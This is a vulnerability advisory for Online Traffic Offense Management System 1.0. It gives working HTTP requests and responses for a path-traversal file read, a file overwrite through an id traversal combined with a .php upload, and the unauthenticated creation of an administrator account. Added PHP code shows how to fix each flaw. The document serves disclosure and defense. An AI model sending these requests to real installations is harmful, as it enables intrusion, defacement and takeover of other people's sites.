# Exploit Title: Online Traffic Offense Management System 1.0 - Privilege escalation (Unauthenticated)
# Date: 07/10/2021
# Exploit Author: Hubert Wojciechowski
# Contact Author: snup.php@gmail.com
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/14909/online-traffic-offense-management-system-php-free-source-code.html
# Version: 1.0
# Tested on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23

### Privilege escalation

# All requests can be sent by both an authenticated and a non-authenticated user
# The vulnerabilities in the application allow for:
* Reading any PHP file from the server
* Saving files to parent and child directories and overwriting files on the server
* Performing operations by an unauthenticated user with application administrator rights

-----------------------------------------------------------------------------------------------------------------------
# POC
-----------------------------------------------------------------------------------------------------------------------

## Example 1 - Reading any PHP file from the server

Example vulnerable scripts:
http://localhost/traffic_offense/index.php?p=
http://localhost/traffic_offense/admin/?page=

# Request reading the rrr.php file that belongs to another user on the same server

GET /traffic_offense/index.php?p=../phpwcms2/rrr HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close

-----------------------------------------------------------------------------------------------------------------------
# Response

HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 10:09:35 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Connection: close

[...]

Hacked file other user in serwer!

[...]
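The fix on the defending side is to never build an include path from the `p` / `page` parameter. The following is an added example, not the project's own code: the parameter names come from the advisory, while the page directory layout, the allowlist contents and the `resolve_page` helper are assumptions. A page name must match a strict pattern (no dots, so `../` can never appear), be on an explicit allowlist, and canonicalise to a path inside the page directory before it is included.

```php
<?php
// Added example, not the project's own code: a hardened replacement for a
// dispatcher of the form include($_GET['p'] . '.php'). Only the parameter
// names 'p' / 'page' come from the advisory; the page directory layout,
// the allowlist and the helper name are assumptions. Runs on PHP 7.4+.
declare(strict_types=1);

/**
 * Map a requested page name to a file inside $baseDir, or return null.
 * Three independent controls: a strict name pattern (so "../" and "." can
 * never be part of the name), an explicit allowlist (only pages the app
 * ships), and a realpath() containment check (catches anything the first
 * two miss, e.g. a symlink placed inside the page directory).
 */
function resolve_page(string $requested, string $baseDir, array $allowlist): ?string
{
    // Letters, digits and underscore, optionally separated by single '/'.
    if (!preg_match('~^[a-z0-9_]+(?:/[a-z0-9_]+)*$~i', $requested)) {
        return null;
    }
    if (!in_array($requested, $allowlist, true)) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . '/' . $requested . '.php');
    if ($base === false || $path === false) {
        return null; // directory or page file does not exist
    }
    // The canonical page path must start with the canonical base directory.
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// ---- constructed demo: a temp page directory with two real pages ----
$dir = sys_get_temp_dir() . '/pages_' . bin2hex(random_bytes(4));
mkdir($dir . '/drivers', 0700, true);
file_put_contents($dir . '/home.php', '<?php echo "home page";');
file_put_contents($dir . '/drivers/manage_driver.php', '<?php echo "manage driver";');
$allowlist = ['home', 'drivers/manage_driver'];

$attempts = [
    'home',                  // legitimate
    'drivers/manage_driver', // legitimate (the admin page named in the advisory)
    '../phpwcms2/rrr',       // the traversal payload from the advisory
    'drivers/../home',       // rejected by the pattern although realpath() would resolve inside
];
foreach ($attempts as $p) {
    $r = resolve_page($p, $dir, $allowlist);
    printf("%-24s -> %s\n", $p, $r === null ? 'REJECTED' : 'include ' . basename($r));
}
```

In the real dispatcher the only change is `include resolve_page($_GET['p'], __DIR__ . '/pages', $allowlist) ?? '404.php';` in place of the string concatenation; the allowlist is the list of pages the application actually ships, not anything derived from the request.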
-----------------------------------------------------------------------------------------------------------------------
## Example 2 - Saving files to parent and child directories and overwriting files on the server

# Request to read file

GET /traffic_offense/index.php HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Connection: close

-----------------------------------------------------------------------------------------------------------------------
# Response

HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 10:30:56 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Set-Cookie: PHPSESSID=330s5p4flpokvjpl4nvfp4dj2t; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 15095

Online Traffic Offense Management System - PHP
[...]

-----------------------------------------------------------------------------------------------------------------------
# Request to overwrite the file index.php in the main directory of the web app

POST /traffic_offense/classes/Master.php?f=save_driver HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------329606699635951312463334027403
Content-Length: 1928
Origin: http://localhost
Connection: close
Referer: http://localhost/traffic_offense/admin/?page=drivers/manage_driver&id=4
Cookie: PHPSESSID=2nkvkfftfjckjeqfkt6917vnu7
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="id"

5/../../../index
-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="license_id_no"

GBN-1020061
-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="lastname"

Blake
-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="firstname"

Claire
-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="middlename"

C
-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="dob"

1992-10-12
-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="present_address"

Sample Addss 123
-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="permanent_address"

Sample Addess 123
-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="civil_status"

Married
-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="nationality"

Filipino
-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="contact"

09121789456
-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="license_type"

Non-Professional
-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="image_path"

uploads/drivers/
-----------------------------329606699635951312463334027403
Content-Disposition: form-data; name="img"; filename="fuzzdb.php"
Content-Type: image/png

-----------------------------329606699635951312463334027403--

# The new file gets its extension from the client-supplied filename="fuzzdb.php"
# The new file's name and location come from id=5/../../../index, so we can save the file in another directory ;)
# The id value must start with a digit
# Config files can be overwritten the same way

-----------------------------------------------------------------------------------------------------------------------
# Response

HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 10:38:35 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 20
Connection: close
Content-Type: text/html; charset=UTF-8

{"status":"success"}

-----------------------------------------------------------------------------------------------------------------------
# Request to read the file index.php again

GET /traffic_offense/index.php HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Connection: close

-----------------------------------------------------------------------------------------------------------------------
# Response

HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 10:42:17 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Access-Control-Allow-Origin: *
Content-Length: 42
Connection: close
Content-Type: text/html; charset=UTF-8

Hacked other client files in this hosting!

-----------------------------------------------------------------------------------------------------------------------
## Example 4 - Performing operations by an unauthenticated user with application administrator rights

# The application allows you to perform many operations without authorization; the application has no permission matrix. The entire application is vulnerable
# Request adding a new admin user to the application, sent without an authenticated session

POST /traffic_offense/classes/Users.php?f=save HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------210106920639395210803657370685
Content-Length: 949
Origin: http://localhost
Connection: close
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="id"

21
-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="firstname"

hack
-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="lastname"

hack
-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="username"

hack
-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="password"

hack
-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="type"

1
-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="img"; filename="aaa.php"
Content-Type: application/octet-stream

-----------------------------210106920639395210803657370685--

-----------------------------------------------------------------------------------------------------------------------
# Response

HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 10:50:36 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Set-Cookie: PHPSESSID=2l1p4103dtj3j3vrod0t6rk6pn; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 1
Connection: close
Content-Type: text/html; charset=UTF-8

1

# The request succeeded; you can now log into the app using the hack account
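Example 2 and Example 4 fail on the same three missing checks: the save actions run without any session or role check, the `id` field is used as part of a file name without being validated as an integer, and the uploaded file keeps whatever extension the client sent. The block below is an added example and not the project's own code: the endpoint names `Master.php?f=save_driver` and `Users.php?f=save` come from the advisory, while the session layout (`$_SESSION['userdata']`), the meaning of `type=1`, the upload directory and the helper names are assumptions. The constructed demo replays the shape of both advisory requests against the guard.

```php
<?php
// Added example, not the project's own code: the server-side checks that
// close the two issues shown above, written as the guard in front of a
// "save" action such as classes/Master.php?f=save_driver or
// classes/Users.php?f=save. The session layout ($_SESSION['userdata']),
// the meaning of type=1 and the upload directory are assumptions. PHP 7.4+.
declare(strict_types=1);

/** True only for a logged-in session whose user record is an administrator. */
function is_admin(array $session): bool
{
    $user = $session['userdata'] ?? null;
    // Assumed convention: type 1 = administrator (the advisory's request sends type=1).
    return is_array($user) && isset($user['id']) && (int)($user['type'] ?? 0) === 1;
}

/** Accept only a plain positive integer; "5/../../../index" is rejected outright. */
function validate_record_id(string $id): ?int
{
    return (ctype_digit($id) && (int)$id > 0) ? (int)$id : null;
}

/**
 * Decide where an uploaded image may be stored, or return null to reject it.
 * The client's filename contributes only its extension, and only when that
 * extension is allowlisted and agrees with the file's real content type. The
 * directory is fixed by the server (the request's image_path field is ignored)
 * and the stored name is the validated record id, never client data.
 */
function safe_upload_target(string $clientName, string $tmpFile, string $uploadDir, int $recordId): ?string
{
    static $allowed = ['jpg' => 'image/jpeg', 'jpeg' => 'image/jpeg', 'png' => 'image/png'];
    $ext = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    if (!isset($allowed[$ext])) {
        return null; // .php and anything else outside the allowlist
    }
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmpFile);
    if ($mime !== $allowed[$ext]) {
        return null; // extension and actual content disagree
    }
    return rtrim($uploadDir, '/') . '/' . $recordId . '.' . $ext;
}

/** The complete guard; returns [status, message] instead of exiting so it can be tested. */
function handle_save(array $session, array $post, array $file, string $uploadDir): array
{
    if (!is_admin($session)) {
        return [403, 'not an administrator session'];
    }
    $id = validate_record_id((string)($post['id'] ?? ''));
    if ($id === null) {
        return [400, 'id must be a positive integer'];
    }
    $target = safe_upload_target($file['name'], $file['tmp_name'], $uploadDir, $id);
    if ($target === null) {
        return [400, 'upload rejected'];
    }
    // Real handler: move_uploaded_file($file['tmp_name'], $target) and update the row.
    return [200, 'would store upload as ' . basename($target)];
}

// ---- constructed demo input (not captured from a real request) ----
$tmp = sys_get_temp_dir() . '/upl_' . bin2hex(random_bytes(4));
mkdir($tmp, 0700);
// A minimal real PNG: signature plus a 1x1 IHDR chunk with a correct CRC.
$ihdr = pack('N', 1) . pack('N', 1) . "\x08\x06\x00\x00\x00";
$png  = "\x89PNG\r\n\x1a\n" . pack('N', 13) . 'IHDR' . $ihdr . pack('N', crc32('IHDR' . $ihdr));
file_put_contents("$tmp/real.png", $png);
file_put_contents("$tmp/script.php", "<?php echo 'x';");

$anonymous = [];                                        // Example 4: no session at all
$admin     = ['userdata' => ['id' => 1, 'type' => 1]];  // assumed admin session
$cases = [
    ['no session, id=21, aaa.php',          $anonymous, '21',               'aaa.php',    "$tmp/script.php"],
    ['admin, id=5/../../../index, fuzzdb.php', $admin,  '5/../../../index', 'fuzzdb.php', "$tmp/script.php"],
    ['admin, id=5, photo.php',              $admin,     '5',                'photo.php',  "$tmp/script.php"],
    ['admin, id=5, photo.png',              $admin,     '5',                'photo.png',  "$tmp/real.png"],
];
foreach ($cases as [$label, $session, $id, $name, $file]) {
    [$status, $msg] = handle_save($session, ['id' => $id], ['name' => $name, 'tmp_name' => $file], "$tmp/uploads/drivers");
    printf("%-42s -> %d %s\n", $label, $status, $msg);
}
```

Only the last case reaches the storage step; the first is stopped by the role check, the second by the integer check before any path is built, and the third by the extension allowlist. Keeping the checks in that order means an unauthenticated caller learns nothing about the id or upload validation, and the response body of a rejected request never echoes the client's filename.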